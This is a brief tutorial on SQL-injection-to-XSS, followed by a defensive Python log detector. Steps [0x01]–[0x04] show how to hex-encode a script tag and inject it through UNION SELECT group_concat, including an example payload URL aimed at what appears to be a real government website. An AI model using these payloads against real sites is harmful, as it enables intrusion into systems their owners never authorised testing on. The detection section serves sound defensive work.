# The trick is based on hexadecimal encoding.
[0x01] You have found an SQLi vulnerability in a website:
http://www.vulnerable.com/index.php?id=560
[0x02] Next, count the columns. Suppose you get 5 columns and column 3 is
vulnerable.
[0x03] Next, encode your JavaScript as a hexadecimal value.
For example, the hexadecimal value of <script>alert("Ajith 'n Ajmal")</script> is
3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e
[0x04] Insert the hexadecimal value into the group_concat function.
The URL now becomes
www.vulnerable.com/index.php?id=560+UNION+SELECT+1,2,group_concat(0xhexadecimalvalue),4,5
Eg. http://www.commerce.gov.pk/ptmaview.php?ID=-32%20union%20select%201,2,3,group_concat%280x3c7363726970743e616c65727428224a756e6f5f6f6b796f277320426c6f6722293c2f7363726970743e%29,5,6,7,8,9,10,11,12,13,14
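
Seen from the defending side, the request built in steps [0x03] and [0x04] stands out in access logs, because the hex literal in the query string decodes straight back to markup. The Python sketch below is an added example, not part of the original post: the request lines are constructed, and the 8-byte minimum literal length and the markup patterns are assumptions to tune for your own traffic.

```python
import re
from urllib.parse import unquote_plus

# MySQL-style hex literal: 0x + an even number of hex digits. Requiring 8+ bytes
# (assumed threshold) skips short numeric constants such as 0xFFEE00.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2}){8,})")
# HTML/JS markup that has no business inside a decoded SQL constant.
MARKUP = re.compile(r"<\s*/?\s*(?:script|img|svg|iframe)\b|\bon\w+\s*=|javascript:", re.I)
UNION_SELECT = re.compile(r"\bunion\b.+?\bselect\b", re.I | re.S)

# Constructed request lines (path and query only), reusing the hex value
# quoted in step [0x03].
PAGE_HEX = ("3c7363726970743e616c6572742822416a69746820276e20416a6d616c"
            "22293c2f7363726970743e")
SAMPLE_REQUESTS = [
    "/index.php?id=560",
    "/index.php?id=560+UNION+SELECT+1,2,group_concat(0x" + PAGE_HEX + "),4,5",
    "/index.php?id=-1%20union%20select%201,2,group_concat%280x" + PAGE_HEX + "%29,4,5",
    "/theme.php?color=0xFFEE00",
]

def inspect_request(url):
    """URL-decode the query string and decode every hex literal found in it."""
    query = unquote_plus(url.split("?", 1)[1]) if "?" in url else ""
    literals = [bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")
                for m in HEX_LITERAL.finditer(query)]
    return {
        "union_select": bool(UNION_SELECT.search(query)),
        "hex_literals": literals,
        "markup_in_hex": [s for s in literals if MARKUP.search(s)],
    }

def flag_requests(urls):
    """Return (url, decoded markup) pairs for requests that warrant an alert."""
    hits = []
    for url in urls:
        result = inspect_request(url)
        if result["markup_in_hex"]:
            hits.append((url, result["markup_in_hex"]))
    return hits

if __name__ == "__main__":
    for url, markup in flag_requests(SAMPLE_REQUESTS):
        print("ALERT", url[:40] + "...", "->", markup)
```

Detection like this is a backstop: the injection itself is closed by parameterized queries, and the script only runs because the page prints the column value without HTML-escaping it.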